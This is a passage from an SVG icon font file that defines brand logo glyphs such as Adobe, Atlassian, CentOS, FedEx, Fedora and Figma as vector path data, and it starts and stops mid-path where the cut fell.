c0 9.90039 6.7002 14.0996 16.7998 14.0996h0.200195c10.0996 0 16.7998 -4.19922 16.7998 -14.0996c0 -8.40039 0.900391 -12.2002 -3.7998 -12.2998h-3.40039c-4.5 0 -3.7998 3.2998 -3.7998 10.5c0 4.7002 -2.2998 6.09961 -5.7998 6.09961
s-5.7998 -1.39941 -5.7998 -6.09961v-36.6006c0 -4.69922 2.2998 -6.09961 5.7998 -6.09961s5.7998 1.40039 5.7998 6.09961c0 8.10059 -1 12.1006 3.7998 12.1006h3.40039zM139.3 168.3c2.5 0 3.7998 -1.2998 3.7998 -3.7998v-2.09961
c0 -2.5 -1.2998 -3.80078 -3.7998 -3.80078h-21.8994c-2.5 0 -3.80078 1.30078 -3.80078 3.80078v59.0996c0 2.5 1.30078 3.90039 3.7002 3.7998h21.7002c2.5 0 3.7998 -1.2998 3.7998 -3.7998v-2.09961c0 -2.5 -1.2998 -3.80078 -3.7998 -3.80078h-14.4004v-18.2998
h11.4004c2.5 0 3.7998 -1.2998 3.7998 -3.7998v-2.09961c0 -2.5 -1.2998 -3.80078 -3.7998 -3.80078h-11.4004v-19.2998h14.7002zM97.2998 186.8l8.10059 -23.8994c0.799805 -2.60059 -0.400391 -4.40039 -3.2002 -4.40039h-3.2998c-2.2002 0 -3.60059 1 -4.30078 3.2002
l-7.39941 23.5h-5.60059v-22.9004c0 -2.5 -1.2998 -3.7998 -3.7998 -3.7998h-3.39941c-2.5 0 -3.80078 1.2998 -3.80078 3.7998v59.1006c0 2.5 1.30078 3.7998 3.80078 3.7998h13.3994c10.1006 0 16.7998 -4 16.7998 -14.1006v-11.8994
c0 -6.40039 -2.69922 -10.4004 -7.2998 -12.4004zM93.5 200.8v8.7002c0 4.7998 -2.5 6.09961 -6.09961 6.09961h-5.80078v-20.8994h5.80078c3.59961 0 6.09961 1.2998 6.09961 6.09961zM173 221.9l11.2002 -59.2002c0.5 -2.7002 -0.799805 -4.10059 -3.40039 -4.10059h-3.5
c-2.2998 0 -3.7002 1.10059 -4.09961 3.5l-1.7998 11.3008h-12.2002l-1.7998 -11.3008c-0.400391 -2.39941 -1.80078 -3.5 -4.10059 -3.5h-3c-2.5 0 -3.89941 1.40039 -3.39941 4.10059l11 59.2002c0.399414 2.2998 1.89941 3.5 4 3.39941h6.89941
c2.2998 0 3.7998 -1.09961 4.2002 -3.39941zM160.7 182.6h9.39941l-4.69922 29.7002zM250 162.4c0 -2.5 -1.2998 -3.80078 -3.7998 -3.80078h-3.40039c-2.5 0 -3.7998 1.30078 -3.7998 3.80078v53.1992h-7.2998c-2.5 0 -3.7998 1.30078 -3.7998 3.80078v2.09961
c0 2.5 1.2998 3.7998 3.7998 3.7998h25.7998c2.5 0 3.7998 -1.2998 3.7998 -3.7998v-2.09961c0 -2.5 -1.2998 -3.80078 -3.7998 -3.80078h-7.5v-53.1992zM498 163.2c1.2002 0 2 -0.700195 2 -2v-0.799805c0 -1.2002 -0.799805 -1.90039 -2 -1.90039h-22.5
c-1.2002 0 -2 0.700195 -2 1.90039v63c0 1.2998 0.799805 2 2 1.7998h22.2002c1.2002 0 2 -0.600586 2 -1.90039v-0.799805c0 -1.2002 -0.799805 -2 -2 -2h-19.1006v-25.7998h16.1006c1.2002 0 2 -0.799805 2 -2v-0.799805c0 -1.2002 -0.799805 -2 -2 -2h-16.1006v-26.7002
h19.4004zM404.9 226.1c10.0996 0 15.2998 -4.69922 15.2998 -14.0996v-40.0996c0 -9.30078 -5.2002 -14.1006 -15.2998 -14.1006h-0.800781c-10.0996 0 -15.2998 4.7998 -15.2998 14.1006v40.0996c0 9.40039 5.2002 14.0996 15.2998 14.0996h0.800781zM415.1 173.7v36.5996
c0 7.90039 -3 11.1006 -10.5 11.1006s-10.5 -3.2002 -10.5 -11.1006v-36.5996c0 -8 3 -11.1006 10.5 -11.1006s10.4004 3.10059 10.5 11.1006zM368.6 188.2l10.6006 -27.2998c0.5 -1.30078 -0.100586 -2.30078 -1.5 -2.30078h-1.5c-1 0 -1.7998 0.400391 -2.2998 1.5
l-10.4004 27.2002h-11.5996v-26.8994c0 -1.2002 -0.700195 -1.90039 -1.90039 -1.90039h-1.2002c-1.2002 0 -2 0.700195 -2 1.90039v63c0 1.19922 0.799805 1.89941 2 1.89941h13.7002c10.0996 0 15.2998 -4.7002 15.2998 -14.0996v-9.7002
c0 -7.2002 -3.09961 -11.7002 -9.2002 -13.2998zM362.2 192.1c7.5 0 10.5 3.2002 10.5 11v6.40039c0 8 -3 11.0996 -10.5 11.0996h-10.2002v-28.5h10.2002zM448.1 225.2c10.1006 0 15.3008 -4.7002 15.3008 -14.1006v-10.5c0 -9.2998 -5.2002 -14.0996 -15.3008 -14.0996
h-10.5996v-26.0996c0 -1.2002 -0.700195 -1.90039 -1.90039 -1.90039h-1.19922c-1.2002 0 -2 0.700195 -2 1.90039v63c0 1.2998 0.799805 2 2 1.7998h13.6992zM458.3 202.4v7.09961c0 7.90039 -3 11.0996 -10.5 11h-10.2002v-29.2002h10.2002
c7.5 0 10.5 3.2002 10.5 11.1006zM256.5 139.9l7.09961 -0.100586l-5.69922 -4.2998l2.09961 -6.7998l-5.7998 4.09961l-5.7998 -4.09961l2.09961 6.7998l-5.7002 4.2998l7.10059 0.100586l2.2998 6.7998zM484.1 276c122.301 -46.0996 118.4 -132.5 -33.8994 -176.3
c13.3994 -49.7002 18.0996 -101.9 0.0996094 -133.8c-3.7998 -6.7002 -16.7998 -27.7002 -47.5996 -27.7002c-41.5 0 -110.2 41.5996 -182.101 142c-42.7998 3.5 -72.1992 10.0996 -84.5996 13c-20.5 -82.2998 -6.7998 -125.3 15.5 -137.9
c1.2002 -0.700195 38.4004 -27.2002 120.9 52.7998c3.39941 -3.5 6.7998 -6.89941 10.1992 -10.1992c-63.0996 -61.2002 -110.199 -71 -138.199 -55.2002c-32.4004 18.2998 -42.8008 72 -22.3008 153.899c-18.8994 5 -121.6 33.2002 -122.1 92.8008
c-0.400391 40.8994 49.7998 74.6992 120.3 95c-13.3994 49.5996 -18.2002 101.8 -0.0996094 133.8c3.7998 6.7002 16.7998 27.7002 47.5996 27.7002c41.6006 0 110.3 -41.6006 182.2 -142.101c21.2998 -1.7998 51.2998 -5.2002 84.5996 -13
c20.5 82 6.90039 125.101 -15.5 137.8c-1.2998 0.700195 -38.3994 27.2002 -120.899 -52.7998c-3.40039 3.5 -6.7998 6.90039 -10.2002 10.2002c52.2998 50.9004 103.7 74.5996 138.2 55.2002c33.8994 -19.2002 41.8994 -75.9004 22.2998 -153.9
c1.90039 -0.5 17.9004 -4.59961 35.5996 -11.2998zM132.9 411.1c-23.1006 -40.7998 1 -121.6 1.19922 -123c12.4004 3.10059 41.6006 10.3008 84.4004 14.6006c16.2002 23.5 33.2998 45.2002 50.7002 64.2002c3.39941 -3.30078 6.7998 -6.7002 10.2002 -10.2002
c-14.4004 -15.7002 -28.6006 -33.2998 -42.2002 -52.4004c42.7002 3.2002 75.0996 1.90039 93.8994 0.900391c-64.5 86.5996 -126.5 126.2 -163.3 126.2c-23 0 -32 -15.2002 -34.8994 -20.3008zM437.7 -27.2002c3.2998 6 21.5 38.6006 -1.2002 123
c-4.09961 -1.09961 -37.0996 -9.89941 -84.4004 -14.5996c-16.1992 -23.6006 -33.2998 -45.2002 -50.6992 -64.2002c-3.40039 3.2998 -6.80078 6.7002 -10.2002 10.2002c14.3994 15.7002 28.5996 33.2998 42.2002 52.3994
c-9.80078 -0.799805 -46.8008 -3.59961 -93.9004 -0.899414c64.5996 -86.7998 126.6 -126.2 163.3 -126.2c23.1006 0 32 15.2002 34.9004 20.2998zM446.8 111.4c25.6006 7.2998 85.9004 27.3994 105.7 62.5c1.40039 2.5 33.5 50.5 -72.5996 90.3994
c-15.3008 5.7998 -29.2002 9.60059 -34.5 11c-3.60059 -12.8994 -7.90039 -26.0996 -12.8008 -39.5c-2 -0.299805 -6.19922 -1.39941 -8.89941 -5.59961l-0.100586 0.0996094c-1.89941 1.7998 -4.19922 3.2998 -6.7998 4.2998c5.7002 15 10.6006 29.8008 14.6006 44.2002
c-7.2002 1.7002 -31.8008 7.60059 -72.2002 11.7002c16.7002 -24.5 27.8994 -44.0996 34.2998 -55.5c-6.09961 -2.09961 -9.2002 -5.7998 -10.4004 -7.40039c-13.5996 16.4004 -11 19.9004 -42.5 64.5c-44.8994 3.10059 -84.5 1.60059 -112.399 -1
c-16.9004 -25 -28.2998 -45.1992 -34.7998 -56.8994c-1.30078 -0.600586 -6.5 -2.7998 -10.2002 -8.40039c-1.10059 3.5 -3.40039 6.2002 -6.40039 8c6.10059 11.4004 16.9004 31 32.7998 55.2998c-39.5996 -4.59961 -65 -11.1992 -72 -13
c4.30078 -14.0996 9.40039 -28.5996 15.2002 -43.2998c-0.899414 -0.599609 -1.59961 -1.39941 -2.2998 -2.2002c-1.5 1.90039 -4 5.30078 -14.4004 5.30078c-4.69922 12.2998 -8.7998 24.5 -12.3994 36.3994c-138.8 -40.3994 -158.4 -121.399 1.5 -164
c3.59961 12.9004 7.7998 26 12.7002 39.4004c1 0 3.69922 -0.200195 6.89941 1c3 -1.2002 5.2002 -1 8.40039 -1c-5.5 -14.6006 -10.2002 -28.9004 -14.1006 -42.9004c3.60059 -0.799805 32 -7.7998 72.2002 -11.7002c-16.2998 23.9004 -27.5 43.4004 -33.7998 54.6006
c8.7002 0 10.7002 1.59961 12.5996 3.2002c1 -0.600586 2 -1.10059 3 -1.5c15.3008 -26.7002 28.9004 -46.6006 36.8008 -57.8008c28.0996 -2.09961 67.2998 -2.89941 112.399 1c16.5 24.3008 27.7002 44 33.9004 55.2002c7.2998 0 9.7998 3 10.8994 4.2002
c1.80078 -1.2998 3.80078 -2.40039 6 -3.2002c-15 -28 -28.6992 -48.8994 -32.1992 -54.2002c40.1992 4.5 71.2998 12.8008 72 13c-4.10059 13.8008 -9 27.9004 -14.7002 42.2002c2 0.900391 3.7998 2.10059 5.39941 3.60059l0.100586 0.0996094
c2 -3.09961 5.7998 -5.7002 10.7002 -5.7002c4.69922 -12.2998 8.7998 -24.5 12.3994 -36.3994zM332.4 225.4c1.2998 0 2 -0.700195 2.19922 -1.90039v-51.5c0 -9.5 -5 -14.0996 -15.0996 -14.0996h-0.400391c-10.0996 0 -15.0996 4.5 -15.0996 14.0996v51.5
c0 1.2002 0.799805 1.90039 2 1.90039h1.2002c1.2002 0 1.89941 -0.600586 1.89941 -1.90039v-49.7998c0 -8 2.60059 -11.1006 10.1006 -11.1006s10.0996 3.2002 10.0996 11.1006v49.7998c0 1.2002 0.700195 1.90039 1.90039 1.90039h1.2002zM318.7 139.9l7.09961 -0.100586
l-5.7002 -4.2998l2.10059 -6.7998l-5.7998 4.09961l-5.80078 -4.09961l2.10059 6.7998l-5.7002 4.2998l7.09961 0.100586l2.30078 6.7998zM287.6 132.5l7.10059 -0.0996094l-5.7002 -4.30078l2.09961 -6.7998l-5.7998 4.10059l-5.7998 -4.10059l2.09961 6.7998
l-5.69922 4.30078l7.09961 0.0996094l2.2998 6.7998zM292.7 163.3c1.2998 0 2 -0.700195 2 -2.09961v-0.799805c0 -1.2002 -0.700195 -1.90039 -2 -1.90039h-22.5c-1.2002 0 -2 0.700195 -2 1.90039v63c0 1.19922 0.799805 1.89941 2 1.89941h22.2002
c1.19922 0 2 -0.599609 2 -1.89941v-0.800781c0 -1.19922 -0.800781 -2 -2 -2h-19.1006v-25.7998h16.1006c1.19922 0 2 -0.799805 2 -2v-0.799805c0 -1.2002 -0.800781 -2 -2 -2h-16.1006v-26.7002h19.4004zM285.3 262.7l2.2998 -6.7998l7.10059 -0.100586l-5.7002 -4.2998
l2.09961 -6.7998l-5.7998 4.09961l-5.7998 -4.09961l2.09961 6.7998l-5.69922 4.2998l7.09961 0.100586z" />
    <glyph glyph-name="adobe" unicode="&#xf778;" horiz-adv-x="460" 
d="M289.9 383.7h170.899v-384zM170.9 383.7l-170.9 -384v384h170.9zM230.4 241.6l107.5 -241.899h-73l-30.7002 76.7998h-78.7002z" />
    <glyph glyph-name="artstation" unicode="&#xf77a;" horiz-adv-x="508" 
d="M0 70.5996h315.1l59.2002 -102.6h-285.399c-20.1006 0 -37.4004 11.5 -45.9004 28.2998zM499.8 98c19 -29.4004 -0.0996094 -55.9004 -2 -59.0996l-40.7002 -70.5l-257.3 447.6h88.4004c19.7002 0 36.7998 -11.0996 45.3994 -27.2998zM273 143.5h-231l115.5 200z" />
    <glyph glyph-name="atlassian" unicode="&#xf77b;" horiz-adv-x="512" 
d="M152.2 211.6c66.2998 -70.7998 89.0996 -189.3 51.2002 -267.1c-2.40039 -5.2002 -7.60059 -8.5 -13.4004 -8.40039h-175c-11 0 -18.4004 11.7002 -13.4004 21.7002l125.801 251c5.09961 10.5 17.0996 11 24.7998 2.7998zM244.4 439.9
c6.7998 10.8994 20.2998 10.6992 25.5996 0.0996094c5.90039 -11.7002 240.4 -482.3 240.4 -482.3c5 -9.90039 -2.2002 -21.7002 -13.4004 -21.7002h-174.2c-5.7002 0 -10.8994 3.2998 -13.3994 8.40039c-73.5 146.899 -187.301 302.1 -65 495.5z" />
    <glyph glyph-name="canadian-maple-leaf" unicode="&#xf785;" horiz-adv-x="466" 
d="M360.8 96.2998c-5 -5 -10 -7.5 -5 -22.5s10 -35.0996 10 -35.0996s-95.2002 20.0996 -105.2 22.5996c-8.89941 0.900391 -18.3994 -2.5 -18.3994 -12.5c0 -10.0996 5.7998 -112.8 5.7998 -112.8h-30s5.7998 102.7 5.7998 112.8c0 10 -9.59961 13.4004 -18.2998 12.5
c-10.0996 -2.5 -105.3 -22.5996 -105.3 -22.5996s5 20.0996 10.0996 35.0996c4.90039 15 0 17.5 -5.09961 22.5c-2.60059 2.5 -105.2 92.4004 -105.2 92.4004l17.5 7.59961c10 4.90039 7.40039 11.4004 5 17.4004c-2.5 7.59961 -20.0996 67.2998 -20.0996 67.2998
s47.5996 -10 57.6992 -12.5c7.5 -2.40039 10 2.5 12.5 7.5s15 32.2998 15 32.2998s52.6006 -59.7998 55.1006 -62.2998c10.0996 -7.5 20.0996 0 17.5996 10c0 10 -27.5996 129.6 -27.5996 129.6s30.0996 -17.3994 40.0996 -22.3994c7.60059 -5 12.6006 -5 17.6006 5
c5 7.5 42.5 79.7998 42.5 79.7998s37.5996 -72.2998 42.6992 -79.7998c5 -10 10.1006 -10 17.6006 -5c10 5 40.0996 22.3994 40.0996 22.3994s-27.5996 -119.6 -27.5996 -129.6c-2.5 -10 7.59961 -17.5 17.5996 -10c2.5 2.40039 55.1006 62.2998 55.1006 62.2998
s12.5 -27.3994 15 -32.3994s5 -9.90039 12.5 -7.5c10 2.5 57.6992 12.5 57.6992 12.5s-17.6992 -59.7002 -20.0996 -67.3008c-2.40039 -5.89941 -5 -12.5 5 -17.3994l17.5 -7.5s-102.7 -89.9004 -105.2 -92.4004z" />
    <glyph glyph-name="centos" unicode="&#xf789;" horiz-adv-x="447" 
d="M289.6 350.2l31.6006 -31.7002l-76.2998 -76.5v108.2h44.6992zM127.2 318.5l31.5996 31.7002h44.7002v-108.2zM168.7 360.1l55.5 55.6006l55.5 -55.6006h-44.7002v-127.899l-10.7998 -10.7998l-10.7998 10.7998v127.899h-44.7002zM194.9 192l-10.8008 -10.7998h-128.6
v-44.7998l-55.5 55.5996l55.5 55.5996v-44.7998h128.6zM274.2 212.7l76.2998 76.5l31.5996 -31.7002v-44.7998h-107.899zM447.5 192l-55.5 -55.5996v44.7998h-127.7l-10.7998 10.7998l10.7998 10.7998h127.7v44.7998zM65.4004 271.5v78.7002h79.3994l-31.5996 -31.7002
l90.2998 -90.5v-15.2998h-15.2998l-90.2998 90.5zM382.1 350.2v-78.7002l-31.5996 31.7002l-90.2998 -90.5h-15.2998v15.2998l90.2998 90.5l-31.6006 31.7002h78.5zM203.5 33.7998v-0.0996094h-44.7002l-31.5996 31.7002l76.2998 76.5v-108.101zM65.4004 212.7v44.7998
l32.5 31.7002l76.2998 -76.5h-108.8zM382.1 112.5v-78.7002h-78.5l31.6006 31.7002l-90.2998 90.5v15.2998h15.2998l90.2998 -90.5zM382.1 171.3v-44.7998l-31.5996 -31.7002l-76.2998 76.5h107.899zM321.2 65.5l-31.6006 -31.5996h-44.6992v108.1zM97.9004 94.7998
l-32.5 31.7002v44.7998h108.8zM279.7 23.9004l-55.5 -55.6006l-55.5 55.6006h44.7002v127.899l10.7998 10.7998l10.7998 -10.7998v-127.899h44.7002zM113.2 65.5l31.5996 -31.7002h-79.3994v78.7002l32.5 -31.7002l90.2998 90.5h15.2998v-15.2998z" />
    <glyph glyph-name="confluence" unicode="&#xf78d;" horiz-adv-x="512" 
d="M2.2998 35.7998c42.2998 66.9004 125.2 233.2 373.101 112.601c39.6992 -19.1006 83.6992 -39.9004 105.899 -50.3008c8 -3.69922 11.7002 -13.1992 8.10059 -21.2998l-50.4004 -114.1c-0.0996094 -0.100586 -0.0996094 -0.299805 -0.200195 -0.400391
c-3.89941 -8.09961 -13.5996 -11.5996 -21.7002 -7.7002c-200.399 95.2002 -213.8 111.5 -280.899 -0.699219c0 0 -0.100586 -0.100586 -0.100586 -0.200195c-4.69922 -7.7002 -14.6992 -10 -22.3994 -5.2998l-105.9 65.1992c-7.59961 4.7002 -10 14.6006 -5.5 22.2002z
M509.7 347.9c-42.6006 -67.5 -125.4 -232.9 -373.4 -112.9c-39.7002 19.2002 -83.7998 40 -106 50.4004c-8 3.69922 -11.7002 13.1992 -8.09961 21.2998l50.5 114.1c0.0996094 0.100586 0.0996094 0.299805 0.200195 0.400391
c3.89941 8.09961 13.5996 11.5996 21.6992 7.7002c199.5 -94.7002 213.301 -111.7 280.601 0.899414c0.200195 0.400391 0.399414 0.700195 0.599609 1c5 7.5 15.1006 9.40039 22.6006 4.40039l105.8 -65.1006c7.59961 -4.69922 10 -14.5996 5.5 -22.1992z" />
    <glyph glyph-name="dhl" unicode="&#xf790;" horiz-adv-x="640" 
d="M238 146.8l22.2998 30.2002h58.7002l-22.2998 -30.2002h-58.7002zM0 165.1h86.5l-4.7002 -6.39941h-81.7998v6.39941zM172.9 177h68.1992c-5.69922 -7.7998 -24.0996 -30.2998 -57.1992 -30.2998h-100.101l41.1006 55.7998h51c5.59961 0 5.59961 -2.2002 2.7998 -5.90039
c-2.7998 -3.69922 -7.60059 -10.2998 -10.4004 -14.0996c-1.39941 -1.90039 -4.09961 -5.5 4.60059 -5.5zM490.4 183.9h-62.2002l39.2998 53.3994h62.2002zM95.2998 177l-4.7002 -6.40039h-90.5996v6.40039h95.2998zM206.3 203.6
c2.7998 3.7002 2.90039 5.90039 -2.7002 5.90039h-111.399l20.3994 27.7998h117.9c29.9004 0 37.5996 -23.5996 29.2002 -35c-6.2002 -8.39941 -13.5 -18.3994 -13.5 -18.3994h-45.6006c-8.69922 0 -6 3.5 -4.59961 5.5c2.7998 3.7998 7.5 10.3994 10.2998 14.1992zM0 146.8
v6.40039h77.7998l-4.7002 -6.40039h-73.0996zM323 146.8c0 0 22.2002 30.2002 22.2998 30.2002h58.7002l-22.2998 -30.2002h-58.7002zM545 146.7l4.7002 6.39941h90.2998v-6.39941h-95zM567.3 177h72.7002v-6.40039h-77.4004zM553.8 158.7l4.7002 6.39941h81.5v-6.39941
h-86.2002zM389.6 237.3h58.7002l-39.2998 -53.3994h-143.6l39.2998 53.3994h58.7002l-22.5 -30.5996h26.1992zM423.1 177h133.4l-22.2998 -30.2998h-94.2998c-24.1006 0 -30.6006 11.5996 -23.2002 21.5996c2.09961 2.7998 6.39941 8.7002 6.39941 8.7002z" />
    <glyph glyph-name="diaspora" unicode="&#xf791;" horiz-adv-x="461" 
d="M226.6 93.2998c-1.39941 0 -88 -119.899 -88.6992 -119.899c-0.700195 0 -86.6006 60.5 -86.9004 61.1992c-0.299805 0.800781 86.5996 125.7 86.5996 127.4c0 2.2002 -129.6 44 -137.6 47.0996c-1.2998 0.5 31.4004 101.801 31.7002 102.101
c0.599609 0.700195 144.399 -47 145.5 -47c0.399414 0 0.899414 0.599609 1 1.2998c0.399414 2 1 148.6 1.7002 149.6c0.799805 1.2002 104.5 0.700195 105.1 0.300781c1.5 -1 3.5 -156.101 6.09961 -156.101c1.40039 0 138.7 47 139.301 46.2998
c0.799805 -0.899414 31.8994 -102.199 31.5 -102.6c-0.900391 -0.900391 -140.2 -47.0996 -140.601 -48.7998c-0.299805 -1.40039 82.7998 -122.101 82.5 -122.9c-0.200195 -0.700195 -85.5 -63.5 -86.2998 -63.5c-1 0.200195 -89 125.5 -90.9004 125.5z" />
    <glyph glyph-name="fedex" unicode="&#xf797;" horiz-adv-x="640" 
d="M586 163.5l54 -60.5h-64.4004l-22.2998 25l-22.0996 -25h-212.2v11.9004h-0.5c-7.90039 -11.7002 -20.7998 -18.6006 -34.9004 -18.6006c-32.6992 0 -56.3994 26.4004 -60.0996 56.9004h-85.5c0 -23.5 31.0996 -35.5 45.7998 -14.6006h42
c-27.5996 -67.6992 -130.2 -49.3994 -130.2 23.7002c0 6.40039 0.800781 12.5 2.30078 18.2002h-48.9004v-77.5h-49v184.4h109v-41.1006h-60v-26.2002h54.7998v-24.1992c24.5 43.5996 103.9 45.3994 121.9 -14c7.5 25.5 28.8994 44.8994 57.2998 44.8994
c13.9004 0 25.7998 -3.7998 35.4004 -14.7998h0.5v75.5h151.199v-48.0996h-56.0996v-16h118.7l22.5 -24.8008l21.7002 24.8008h62.3994zM139.3 180.1h46.5c-4.7998 25.6006 -40.3994 26.3008 -46.5 0zM292.7 131.2c34.5 0 32.5996 62.7998 0 62.7998
c-34 0 -34.6006 -62.7998 0 -62.7998zM460.5 112.1v29.6006h-56.0996v44.7002h56.0996v28.0996h-55.5v33.9004h56.0996v30.1992h-95v-166.5h94.4004zM414.6 151.9h56.1006v-45.6006l50.7002 57l-50.7002 57v-44h-56.1006v-24.3994zM553.2 141.6l26.2998 -29.5h40.5
l-46 51.4004l45.4004 51h-38.5l-25.6006 -29.2998l-26.5996 29.2998h-39.7002l45.5996 -51.2002l-45.5996 -51.2002h38.0996z" />
    <glyph glyph-name="fedora" unicode="&#xf798;" 
d="M225 416c123.7 -0.299805 223.7 -100.9 223.4 -224.6c-0.300781 -123.7 -100.9 -223.7 -224.601 -223.4l-170.2 0.400391c-29.7998 0.0996094 -53.6992 24.0996 -53.5996 53.8994l0.400391 170.3c0.399414 123.7 100.899 223.7 224.6 223.4zM394.8 258.8
c-0.200195 8 -1 15.2002 -2.7998 22.4004l-55.2002 56.0996v-1.59961c0 -5.10059 -1.5 -9.60059 -3.7998 -14.2998zM331 353.7c2 -2.90039 3.40039 -5.7998 4.2002 -9.2002l54.2998 -54.5996c-9.5 28.6992 -31 51.8994 -58.5 63.7998zM118.1 200.8
c-5.59961 -0.399414 -11 -1.5 -16.1992 -2.89941l8.5 -8.5c2.09961 4.19922 4.59961 8 7.69922 11.3994zM97 196.6c-4.7002 -1.2998 -9.40039 -3.09961 -13.7002 -5.19922l27 -27.2002c-1.5 4 -2.39941 8 -2.39941 12.5l0.899414 8zM78.7998 189.2
c-3.7998 -2.2002 -7.7998 -4.60059 -11.2002 -7.2002l35.3008 -35.9004c4.5 2.30078 9.39941 3.80078 14.0996 4.7002zM63.5996 179.4c-3.59961 -2.90039 -7.19922 -5.80078 -10.0996 -9.40039l34.9004 -34.5996c3.09961 3.09961 6.69922 6 10.5 8.5zM50.2998 167.1
c-2.89941 -3.2998 -5.7998 -6.69922 -8.59961 -10.5l35.7998 -35.8994c2.2998 4.5 4.7998 8 7.7002 11.3994zM39.2998 152.8c-2.5 -3.7998 -4.7002 -7.7998 -6.7002 -12l39.5 -39.7998c0.400391 5.2998 1.60059 10.5 3.60059 15.2002zM30.5 136.5
c-1.7998 -4.90039 -3.2998 -9.59961 -4.7002 -14.5l52.7002 -53.5c-3.7998 7.7998 -6.5 16.7998 -6.7002 26.2002zM22.5996 93.5c0 -7.59961 1.10059 -14.7998 2.90039 -21.9004l55.4004 -55.6992v1.09961c0 5.09961 1.39941 10.0996 3.59961 14.2998zM27.9004 62.7998
c9.5 -28.7002 31 -51.7998 58.5 -63.7998c-2 2.90039 -3.30078 5.7998 -4.2002 9.2002zM22.5996 99.7998l64.4004 -64.2002c2.7002 3.30078 6.09961 6.5 9.90039 8.7002l-72.2002 72.5c-1.2002 -5.59961 -2.10059 -11.2002 -2.10059 -17zM275.9 151.6
c32.5996 -0.0996094 32.6992 49.2002 0.199219 49.4004l-33.5996 0.0996094c-4.90039 0 -8.90039 4 -8.90039 9l0.100586 47c0.0996094 40.5 38.5996 60.8008 66 54.9004c15.3994 -3.90039 30.2998 8.40039 30.2998 23.9004c0 12.0996 -8.7002 22.1992 -19.9004 24
c-6.7998 1.59961 -13.2998 2.2998 -20.1992 2.2998c-58.3008 0.200195 -105.4 -46.7998 -105.601 -105l-0.0996094 -56l-42.6006 0.0996094c-32.5996 0.100586 -32.6992 -49.2002 -0.0996094 -49.2998l33.5996 -0.0996094c4.40039 0 8.90039 -4.5 8.90039 -9l-0.0996094 -47
c0 -31 -25.2002 -56 -56.1006 -55.9004c-9.39941 0 -9.39941 1.59961 -15.7002 1.59961c-13.1992 0 -24.5 -11.1992 -24.5 -24.5996c0 -15.5 14.2002 -24.2002 19.9004 -24.2002c61.2998 -12.8994 125.5 33.6006 125.7 102.9l0.0996094 56zM299.4 151.9
c5.59961 0.5 11 1.59961 16.0996 2.89941l-8.5 8.5c-1.7998 -4.2002 -4.2002 -8 -7.59961 -11.3994zM320.4 156.1c4.7998 1.40039 9.5 3.10059 13.6992 5.30078l-27 27.1992c1.5 -4 2.40039 -8 2.40039 -12.5l-0.900391 -8.09961zM338.4 163.5
c4 2.2002 8.09961 4.7002 11.8994 7.2002l-36.2002 35.8994c-4.09961 -2.2998 -8.7998 -3.59961 -13.6992 -4.69922zM353.9 173.3c3.59961 2.90039 6.89941 5.7998 10.0996 9l-34.9004 35c-3.19922 -3.2002 -6.69922 -6.09961 -10.5 -8.5zM367.1 185.6
c2.90039 3.30078 5.90039 6.7002 8.60059 10.5l-35.7998 35.9004c-2.30078 -4.2002 -4.80078 -8.09961 -7.7002 -11.4004zM378.1 199.9c2.5 3.7998 4.80078 7.7998 6.7002 12l-39.5 39.7998c-0.399414 -5.2998 -1.59961 -10.5 -3.59961 -15.2002zM391.6 230.8
l-53.0996 53.4004c4.2002 -7.7998 6.90039 -16.7998 7.09961 -26.2002l41.3008 -41.5c1.7998 4.7002 3.39941 9.40039 4.69922 14.2998zM392.6 236.4c1.30078 5.09961 2 11.1992 2.30078 16.5996l-64.3008 64.7002c-2.69922 -3.7998 -6.09961 -7 -9.89941 -9.2002z" />
    <glyph glyph-name="figma" unicode="&#xf799;" horiz-adv-x="341" 
d="M256 277.3h-85.4004v-256c0 -47.0996 -38.1992 -85.2998 -85.2998 -85.2998c-47.0996 0 -85.2998 38.0996 -85.2998 85.2998s38.2002 85.4004 85.2998 85.4004c-47.0996 0 -85.2998 38.2002 -85.2998 85.2998s38.2002 85.2998 85.2998 85.4004
c-47.0996 0 -85.2998 38.1992 -85.2998 85.2998c0 47.0996 38.2002 85.2998 85.2998 85.2998h170.7c47.0996 0 85.2998 -38.2998 85.2998 -85.4004c0 -47.0996 -38.2002 -85.2998 -85.2998 -85.2998zM256 277.3c47.0996 0 85.2998 -38.2002 85.2998 -85.2998
s-38.2002 -85.2998 -85.2998 -85.2998s-85.2998 38.2002 -85.2998 85.2998s38.2002 85.2998 85.2998 85.2998z" />
    <glyph glyph-name="intercom" unicode="&#xf7af;" 
d="M392 416c30.9004 0 56 -25.0996 56 -56v-336c0 -30.9004 -25.0996 -56 -56 -56h-336c-30.9004 0 -56 25.0996 -56 56v336c0 30.9004 25.0996 56 56 56h336zM283.7 333.9v-199.5c0 -19.8008 29.8994 -19.8008 29.8994 0v199.5c0 19.7998 -29.8994 19.7998 -29.8994 0z
M209.1 341.4v-216.5c0 -19.8008 29.9004 -19.8008 29.9004 0v216.5c0 19.7998 -29.9004 19.7998 -29.9004 0zM134.4 333.9v-199.5c0 -19.8008 29.8994 -19.8008 29.8994 0v199.5c0 19.7998 -29.8994 19.7998 -29.8994 0zM59.7002 304v-134.3
c0 -19.7998 29.8994 -19.7998 29.8994 0v134.3c0 19.7998 -29.8994 19.7998 -29.8994 0zM383.1 76.2002c14.9004 12.8994 -4.5 35.5996 -19.3994 22.7002c-63.2002 -53.9004 -213.4 -55.3008 -279.3 0c-15 12.7998 -34.4004 -9.90039 -19.4004 -22.7002
c76.4004 -65.4004 245.3 -63 318.1 0zM388.3 169.7v134.3c0 19.7998 -29.8994 19.7998 -29.8994 0v-134.3c0 -19.7998 29.8994 -19.7998 29.8994 0z" />
    <glyph glyph-name="invision" unicode="&#xf7b0;" 
d="M407.4 416c22.3994 0 40.5996 -18.2002 40.5996 -40.5996v-366.801c0 -22.3994 -18.2002 -40.5996 -40.5996 -40.5996h-366.801c-22.3994 0 -40.5996 18.2002 -40.5996 40.5996v366.801c0 22.3994 18.2002 40.5996 40.5996 40.5996h366.801zM176.1 302.4
c-0.599609 35.0996 -53.5996 34.7998 -53.6992 -0.400391c0 -15 12.1992 -27 27.0996 -27c4.2002 0.0996094 27 4 26.5996 27.4004zM332.8 71c23.7998 0 42.7002 15.2998 53.2002 52l-17.9004 6.7002c-14.2998 -39.5 -31.7998 -32.4004 -31.7998 -16.9004
c0.299805 8.10059 0.700195 7.7002 14.9004 58.7998c26.0996 85.8008 -61.2998 113.5 -101.8 38l8.89941 40.5h-68.7998l-9.7002 -35.5996h32.2998l-19.7998 -79.4004c-16.5 -36.6992 -57.3994 -44.0996 -57.3994 -23.1992c0.299805 11.2998 -0.700195 4.5 32.8994 138.199
